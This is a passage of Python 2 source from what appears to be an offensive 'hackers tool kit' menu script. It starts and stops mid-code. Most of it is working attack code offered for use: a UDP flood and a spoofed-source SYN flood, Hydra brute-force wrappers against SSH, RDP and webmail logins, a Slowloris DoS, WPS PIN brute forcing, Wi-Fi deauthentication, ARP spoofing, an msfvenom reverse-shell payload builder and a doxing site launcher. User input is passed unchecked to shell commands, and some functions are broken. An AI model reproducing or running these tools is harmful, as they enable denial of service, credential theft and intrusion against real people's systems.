{0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and 